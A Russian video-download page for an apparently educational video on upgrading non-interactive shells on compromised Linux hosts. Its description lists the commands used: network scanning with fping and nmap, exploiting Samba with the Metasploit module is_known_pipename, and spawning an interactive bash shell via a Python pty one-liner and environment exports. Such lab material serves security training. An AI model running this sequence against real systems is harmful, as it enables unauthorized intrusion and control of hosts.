У нас вы можете посмотреть бесплатно Project 148 - Upgrading Non-Interactive Shells on Compromised Linux Hosts или скачать в максимальном доступном качестве, видео которое было загружено на ютуб. Для загрузки выберите вариант из формы ниже:
Если кнопки скачивания не
загрузились
НАЖМИТЕ ЗДЕСЬ или обновите страницу
Если возникают проблемы со скачиванием видео, пожалуйста напишите в поддержку по адресу внизу
страницы.
Спасибо за использование сервиса ClipSaver.ru
Commands Used (in the order that they appear in the video): 1. ifconfig 2. fping -a -g 192.185.44.0/24 3. nmap -sV 192.185.44.3 4. service postgresql start && msfconsole 5. workspace -a SHELL 6. setg RHOSTS 192.185.44.3 7. search is_known 8. use exploit/linux/samba/is_known_pipename 9. show options 10. exploit 11. /bin/bash -i (to enter bash shell session) 12. exit (to exit bash) 13. cat /etc/shells (to see what shell are installed on the Linux system) 14. /bin/sh -i (to enter a born shell session) 15. ls 16. pwd 17. exit 18. python –version (to see if python is installed) 19. python -c ‘import pty; pty.spawn(“/bin/bash”)’ - to use python to enter bash shell session 20. env (to display the environment variables…missing quite a few things) 21. export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin (to set the default path that will be used to search for the binary when a command is typed) 22. export TERM=xterm (to set the term variable) 23. export SHELL=bash (to set the default shell to bash) 24. env (to display the environment variables) 25. top